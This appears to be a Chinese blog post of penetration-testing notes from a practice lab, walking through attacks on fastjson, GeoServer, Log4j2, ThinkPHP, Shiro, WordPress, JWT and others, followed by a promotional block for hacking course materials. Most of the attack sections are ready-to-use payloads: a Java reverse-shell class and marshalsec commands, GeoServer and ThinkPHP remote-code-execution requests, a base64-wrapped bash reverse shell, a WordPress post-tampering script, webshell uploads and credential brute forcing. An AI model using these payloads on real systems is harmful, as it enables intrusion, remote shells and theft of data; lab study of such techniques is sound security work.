一则靶场记录：

一则靶场记录：

极核靶场：1.1. ssh密码爆破：

bitvise：

进入查看命令行 user

sudo su 提权

root

cat …/flag

【ssh登录的爆破工具】：hydra

1.2. mysql弱口令爆破：

navicat:

进入看getshell表里面有flag列

2. Pentest:

2.1. druid【德鲁伊】的api接口弱口令：

2.1.1. 简介：

druid是阿里开发的一个数据库池

在调用数据库时 不需要每次进行重新连接 而是在池中进行调用 加快速度 方便使用。

Druid未授权漏洞的利用主要围绕其监控页面暴露的敏感信息展开。当开发者未正确配置访问控制时，攻击者可直接访问/druid/index.html等监控接口，从中获取Web URI列表（如后台API路径）和Session信息（包括有效用户会话ID）。通过提取/druid/websession.html中的Session值构建字典，结合Burp Suite等工具对后台接口（如/user/showList）进行爆破，筛选出未失效的Session（响应状态码200的请求），即可通过Cookie替换工具劫持合法用户身份。成功利用后，攻击者不仅能窃取数据库连接信息、SQL执行记录等敏感数据，还可能直接接管后台管理员权限（如重置用户密码、操纵业务数据），将原本低危的信息泄露漏洞升级为高危的未授权系统控制。该漏洞的隐蔽性在于，即使Session已过期，攻击者仍可通过持续监控接口获取新会话，形成持久化威胁。

【一个api接口扫描工具】

burp插件：apikit 记得增加字典~

发现api接口泄露：

/api/druid/login.html

druid/123456

2.2. git泄露：

Tsscanplus:

发现git泄露：

利用kali 使用 githack

【githack 是一个py2程序，必须使用py2实现操作】

【gitmaster运行可以使用py3】

python GitHack.py …/.git

进入看index.html

2.3. fastjson1.2.47远程代码执行

https://blog.youkuaiyun.com/Bossfrank/article/details/130100893

2.3.1. 简介：

fastjson:

Fastjson 是阿里巴巴开源的 JSON 解析库，广泛应用于各大 Java 项目中

使用burp suite拦截

看到content-type是application/json解析，就有可能使用fastjson序列化。

fastJSON在反序列化时，可能会将目标类的构造函数、getter方法、setter方法、is方法执行一遍，如果此时这四个方法中有危险操作，则会导致反序列化漏洞，也就是说攻击者传入的序列化数据中需要目标类的这些方法中要存在漏洞才能触发。

攻击者准备rmi服务和web服务，将rmi绝对路径注入到lookup方法中，受害者JNDI接口会指向攻击者控制rmi服务器，JNDI接口向攻击者控制web服务器远程加载恶意代码，执行构造函数形成RCE。

2.3.2. dns.log检测漏洞存在：

找到一个可以传递数据的界面，将数据改为：

{
  "a":{
    "@type":"java.net.Inet4Address",
    "val":"dns.log提供的地址"
  }
}

dns.log收到返回包

说明存在漏洞

2.3.3. 反弹shell:

https://github.com/firstC99/fastjson-1.2.47-RCE

https://blog.youkuaiyun.com/weixin_47598409/article/details/120399972

ip换成kali的IP 端口换成nc要监听的端口

import java.lang.Runtime;
import java.lang.Process;

public class Exploit {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.137.167/1234 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

kali 执行

javac Exploit.java

生成 Exploit.class文件

kali在Exploit.class目录执行：

python3 -m http.server 5566

kali开启开启rmi服务端命令【将5566端口下面的内容使用ldap转发到8889】

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.137.167:5566/#Exploit" 8889
nc -lvnp [java文件的端口]

burp

使用POST方式发送payload

Content-Type: application/x-www-form-urlencoded

修改为 Content-Type: application/json
{
  "a":{
    "@type":"java.lang.Class",
    "val":"com.sun.rowset.JdbcRowSetImpl"
  },
  "b":{
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"rmi://192.168.242.4:8889/Exploit",
    "autoCommit":true
  }
}

最后nc会获得对方的shell

2.4. GeoServer - 远程代码执行:

GeoServer是一款JAVA编写的、开源的、用于共享地理空间数据的软件服务器。

GeoServer 是基于 Java 开发的服务器，运行的时候需要JAVA环境。

GeoServer官方文档推荐Java8或Java11。

在浏览器中输入http://localhost:8080/geoserver/web/，GeoServer服务器启动成功。

ps : 登录名为admin，密码为geoserver。

2.4.1. 检测漏洞存在：

【更换target-ip和端口即可】

GET:【只需要替换访问路径】

GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
Host: target-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0

返回这个Exception即为成功

POST：

POST /geoserver/wfs HTTP/1.1
Host: target-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
</wfs:GetPropertyValue>

返回这个Exception即为成功

或者POST：【dns.log】

POST /geoserver/wfs HTTP/1.1
Host: target-ip:8080
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Length: 326

<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'
valueReference='exec(java.lang.Runtime.getRuntime(),"curl DNS.LOG的地址")'>
<wfs:Query typeNames='topp:states'/>
</wfs:GetPropertyValue>

查看dns.log地址即可

利用time based payload:

【前几中不好使用的时候使用。】

POST /geoserver/wfs HTTP/1.1
Host: target-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>
/+java.lang.T<!--IgnoreMe!!!!-->hread.s[(: IGNORE :)]leep&#010;&#032;&#009;<![CDATA[
(2000)
]]>
  </wfs:valueReference>
</wfs:GetPropertyValue>

服务器返回数据包会很慢，即为成功。。。

提醒：

注：

poc中的typename必须存在

GET在url路径中

POST在倒数第二行参数中

查看当前服务器中所有types的路径：

/geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage?1&filter=false

2.4.2. 反弹shell:

利用java的exec执行命令：

改成kali的ip和nc监听的端口：

bash -i >& /dev/tcp/192.168.137.167/8081 0>&1

上述内容构造好之后使用base64编码

bash -c {echo,【这里是上文base64编码内容】}|{base64,-d}|{bash,-i}

kali执行:nc监听

nc -lvnp 12345
POST /geoserver/wfs HTTP/1.1
Host: node.hackhub.get-shell.com:57150
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Length: 326

<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'
valueReference='exec(java.lang.Runtime.getRuntime(),"【这里写刚刚构造的payload】")'>
<wfs:Query typeNames='topp:states'/>
</wfs:GetPropertyValue>

2.4.3. 利用内网穿透使得对方访问nc

可以使用

systemctl start cpolar

开启内网穿透

将nc的端口传到公网

进一步让对方访问nc端口获得对方反弹的shell

2.5. jwt token垂直越权：

https://xz.aliyun.com/news/7883

2.5.1. 简介

JSON Web Token【jwt】

JWT由三部分构成，分别称为header，payload和signature，

各部分用“.”相连构成一个完整的Token，形如xxxxx.yyyyy.zzzzz。

2.5.1.1. header

Header 头部

• 算法类型（alg）

指定用于生成签名的算法，如 RSA、HMAC 等

如果替换成none，服务器不校验第三部分的签名

• 令牌类型（typ）

指定令牌的类型，默认为 JWT，为 JWT 时可不写

2.5.1.2. payload

payload:

存储了有关用户或实体的声明和其他有关信息，如用户 ID、角色、权限等信息

• exp：jwt 的过期时间，必须大于签发时间
• iat：jwt 的签发时间

2.5.1.3. signature:

Signature 签名

防止前两个字段被修改。对 Header 和 Payload 进行验证，如果前两部分有更改，则 JWT 身份认证失败。

存放位置不一定，可能是 Cookie、url、Authorization 等

arg=none时 不会进行第三段的加密 也就是没有第三段【注：此时结尾依旧要添加.】

所以可以尝试使用arg=none进行越过。

2.5.2. 爆破工具：

jwt爆破工具：

https://github.com/ticarpi/jwt_tool

jwt_tool

python jwt_tools.py <jwt> -C -d jwtboom.txt

使用Es_scan

直接进chrome

右键application【应用】

cookie更改为生成的cookie，之后刷新就可以了。

2.6. log4j2:

https://blog.youkuaiyun.com/Bossfrank/article/details/130148819

2.6.1. 简介：

Apache Log4j 2是对Log4j的升级，它比其前身Log4j 1.x提供了重大改进，并参考了Logback中优秀的设计，同时修复了Logback架构中的一些问题。被誉为是目前最优秀的Java日志框架；企业中通常使用SLF4j门面+Log4j2来记录日志

log4j2是apache下的java应用常见的开源日志库，是一个就Java的日志记录工具。在log4j框架的基础上进行了改进，并引入了丰富的特性，可以控制日志信息输送的目的地为控制台、文件、GUI组建等，被应用于业务系统开发，用于记录程序输入输出日志信息。

JNDI，全称为Java命名和目录接口（Java Naming and Directory Interface）,是SUN公司提供的一种标准的Java命名系统接口，允许从指定的远程服务器获取并加载对象。JNDI相当于一个用于映射的字典，使得Java应用程序可以和这些命名服务和目录服务之间进行交互。JNDI注入攻击时常用的就是通过RMI和LDAP两种服务

2.6.2. 漏洞原理：

log4j2框架下的lookup查询服务提供了{}字段解析功能，传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。这样如果不对lookup的出栈进行限制，就有可能让查询指向任何服务（可能是攻击者部署好的恶意代码）。

攻击者可以利用这一点进行JNDI注入，使得受害者请求远程服务来链接本地对象，在lookup的{}里面构造payload，调用JNDI服务（LDAP）向攻击者提前部署好的恶意站点获取恶意的.class对象，造成了远程代码执行（可反弹shell到指定服务器）。

攻击者构造payload，在JNDI接口lookup查询进行注入，payload为${jndi:ldap:恶意url/poc}，JNDI会去对应的服务（如LDAP、RMI、DNS、文件系统、目录服务…本例为ldap）查找资源，由于lookup的出栈没做限制，最终指向了攻击者部署好的恶意站点，下载了远程的恶意class，最终造成了远程代码执行rce。

【原理和上文的fastjson基本相同】

https://ares-x.com/tools/runtime-exec

这是一个bash命令生成网站：

2.7. MetInfo 4.0

逐个访问：
member :用户登入

admin :管理员登入

注册一个用户之后 抓包修改密码

更改用户名为admin发包

发现更改成功

进入admin页面：

有功能点：
一个是图片上传【采用白名单识别第一个传入的后缀（暂无利用方式）】

另一个是zip文件上传【自解压】

上传shell.php里面是木马然后压缩成zip

查看预览

进入预览目录【这里用浏览器右键查找】

预览文件是这个：

templates/shell/view.jpg

木马文件是这个：

/templates/shell.php

菜刀一连完活。

2.7.1.1. 朵米客服平台 文件上传漏洞：

注册进后台 burp抓包 有个下图的上传图片

改成php完事

2.8. 彩虹目录列表 任意文件上传：

admin

123456

首页上传即可

2.9. wordpress 花咲雨町

2.9.1. REST API用户泄露：

rest api 简单讲解

https://blog.youkuaiyun.com/u011537073/article/details/87882337

在WordPress上有一个REST API，可以获取到当前WordPress的真实用户名，**/wp-json/wp/v2/user**s 是 WordPress REST API 的一个端点，默认情况下，任何人都可以通过访问这个端点来获取网站的用户列表及其详细信息。

看到了一个用户叫webadmin 大概率就是管理员。

2.9.2. xmlrpc.php 可使用方法泄露：

WordPress 的**xmlrpc.php**文件是一个用于处理外部请求的接口，允许通过 XML-RPC 协议与 WordPress 网站进行通信，允许外部应用程序与 WordPress 进行交互，如发布文章、管理评论、获取统计数据、**登录请求**等。

xmlrpc.php 原本是Wordpress 程序留给手机APP用的一个api页面

Tips：在默认情况下，一些主题会禁用 **xmlrpc.php** 这个功能文件（不用这个东西的话可以直接删除这个文件以提升安全性，不影响WordPress的使用），包括本靶机默认情况下也是禁用的，但是为了流程就开起来了。不过在很多的WordPress站点上，这个功能并没有关闭，依然可以利用。

传递下面数据包即可：

POST /xmlrpc.php HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9

<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>

逐个尝试 找到一个wp.getUsersBlogs 盲猜登入

问了ai怎么使用这个：

POST /xmlrpc.php HTTP/1.1
Host: node.hackhub.get-shell.com:63439
Connection: keep-alive
Content-Length: 171

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>webadmin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

爆破密码：

更改后台文件上传限制。

在下面这个上传点上传php_shell就好了

2.9.3. wp文章未授权修改：

**wp4.7.0-4.7.1

https://www.cnblogs.com/yx20145312/p/7019818.html

import json
import sys
import urllib2
from lxml import etree
def get_api_url(wordpress_url):
    response = urllib2.urlopen(wordpress_url)
    data = etree.HTML(response.read())
    u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
    # check if we have permalinks
    if 'rest_route' in u:
        print(' ! Warning, looks like permalinks are not enabled. This might not work!')
    return u
def get_posts(api_base):
    respone = urllib2.urlopen(api_base + 'wp/v2/posts')
    posts = json.loads(respone.read())
    for post in posts:
        print(' - Post ID: {0}, Title: {1}, Url: {2}'
              .format(post['id'], post['title']['rendered'], post['link']))
def update_post(api_base, post_id, post_content):
    # more than just the content field can be updated. see the api docs here:
    # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
    data = json.dumps({
        'content': post_content
    })
    url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
    req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
    response = urllib2.urlopen(req).read()
    print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))
def print_usage():
    print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
if __name__ == '__main__':
    # ensure we have at least a url
    # if we have a post id, we need content too
    print('* Discovering API Endpoint')
    api_url = get_api_url(sys.argv[1])
    print('* API lives at: {0}'.format(api_url))
    # if we only have a url, show the posts we have have
    # if we get here, we have what we need to update a post!
    print('* Updating post {0}'.format(sys.argv[2]))
    #with open(sys.argv[3], 'r') as content:
     #   new_content = content.readlines()
    new_content='fff'
    update_post(api_url, sys.argv[2], new_content)
    print('* Update complete!')

2.10. Alist 粗心的配置：

alist 一个高效简洁的云存储管理工具，支持各路网盘和目录挂载。

通过webDEV协议实现跨平台的各路资源统一访问。

要准确限制alist用户的权限 因为alist用户有权更改挂载目录

这个根文件夹路径是允许根目录/的

甚至可以授权777

在一些时候 获得到alist用户高权限时，可以尝试登入alist用户更改挂载目录。

2.11. shiri反序列化：

Apache Shiro 是一个强大易用的 Java 安全框架，提供了认证、授权、加密和会话管理等功能，对于任何一个应用程序，Shiro 都可以提供全面的安全管理服务。

2.11.1. 550：

ApacheShiro<=1.2.4版本中AES加密时采用的key是硬编码在代码中的，于是我们就可以构造Remembe Me的值，然后让其反序列化执行。

当然同样在大于1.2.4的版本中可以使用key爆破。

登入点选中rememberme

Shiro验证用户登录信息，通过后，查看用户是否勾选了”Remember Me“。

若勾选，则将用户身份序列化，并将序列化后的内容进行AES加密，再使用base64编码。

最后将处理好的内容放于cookie中的rememberMe字段。

Payload的构造流程：

恶意命令–>序列化–>AES加密–>base64编码–>发送Cookie

2.11.2. 721:

Shiro721 序列化是利用已登录用户的合法RememberMe Cookie值，通过服务器对填充密钥的不同响应，从而判断加密值是否被正确填充，构造Pyload。

漏洞特征：

构造恶意的rememberMe数据，看返回包中是不是rememberMe=DeleteMe。

shiro-721加密方式从AES加密升级为AES-128-CBC，而且只有存在有效的用户信息时才会进入下一阶段的流程。所以我们需要先拿到认证登陆后的rememberme字段，作为前缀，然后利用爆破的方式来生成payload

爆破利用了Shiro框架中的身份验证过程中的一个漏洞，该漏洞允许攻击者通过填充信息的不同响应时间来确定身份验证过程中的错误。通过不断尝试不同的填充方式，攻击者可以逐步推断出加密秘钥，并最终获取访问权限。

获取正确的认证cookie->生成payload->爆破加密密钥->cookie

工具：https://github.com/SummerSec/ShiroAttack2

2.12. Spring Boot HeapDump泄露漏洞

扫spring自己的目录字典，

actuator都有

swagger-ui接口露的【但是没用上】

admin后台登入

actuator/loggers

logger:root

actuator/env

username：webadmin

heapdump露头了 直接访问下载

然后工具过一下：

登入就好了

2.13. thinkphp5.0.23:远程代码执行

ThinkPHP 5.0.23的远程代码执行漏洞源于框架路由机制与参数过滤的设计缺陷。攻击者通过构造包含_method=__construct的恶意请求，覆盖Request类的构造函数参数，并利用filter[]=system注入危险函数，将用户输入直接传递给system等系统命令执行函数。例如，Payload通过server[REQUEST_METHOD]=ls触发命令执行，甚至可上传Base64编码的Webshell（如<?php @eval($_POST['x'])?>）实现持久化控制。漏洞利用条件包括未开启强制路由、未升级至安全版本（5.0.24+），以及允许动态路由解析。

POST /?s=captcha HTTP/1.1
Host: node.hackhub.get-shell.com:52484
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://node.hackhub.get-shell.com:52484/?s=captcha
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9
Content-Length: 80

_method=__construct&filter%5B%5D=system&method=get&server%5BREQUEST_METHOD%5D={这里是要执行的命令}

黑客&网络安全如何学习**

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我们和网安大厂360共同研发的的网安视频教程，之前都是内部资源，专业方面绝对可以秒杀国内99%的机构和个人教学！全网独一份，你不可能在网上找到这么专业的教程。

内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识，而且包含了中级的各种渗透技术，并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频，200多G的资源，不用担心学不全。

因篇幅有限，仅展示部分资料，需要见下图即可前往获取

🐵这些东西我都可以免费分享给大家，需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家，需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包，需要的话也可以拿走。

🐵这些东西我都可以免费分享给大家，需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家，需要的可以点这里自取👉:网安入门到进阶资源
————————————————

本文转自 https://blog.youkuaiyun.com/bdfcfff77fa/article/details/149216687?spm=1001.2014.3001.5502，如有侵权，请联系删除。